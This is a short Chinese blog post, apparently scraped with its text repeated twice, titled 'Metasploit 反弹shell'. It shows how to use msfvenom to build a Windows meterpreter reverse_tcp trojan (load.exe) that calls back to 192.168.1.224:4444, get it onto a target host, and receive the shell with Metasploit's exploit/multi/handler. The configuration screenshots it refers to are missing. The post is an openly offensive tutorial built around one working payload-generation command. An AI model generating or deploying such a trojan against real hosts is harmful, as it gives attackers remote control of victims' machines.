首先,使用msfvenom制作一个普通木马。
命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.224 lport=4444 -f exe > load.exe

然后将制作出来的msf马传到目标主机上

在msf使用exploit/multi/handler模块,配置如图:

在msf里会接收到反弹的session会话

shell反弹完成!
首先,使用msfvenom制作一个普通木马。
命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.224 lport=4444 -f exe > load.exe
然后将制作出来的msf马传到目标主机上
在msf使用exploit/multi/handler模块,配置如图:
在msf里会接收到反弹的session会话
shell反弹完成!
本文标题:Metasploit 反弹shell
本文链接:https://www.haomeiwen.com/subject/cdlaiftx.html
网友评论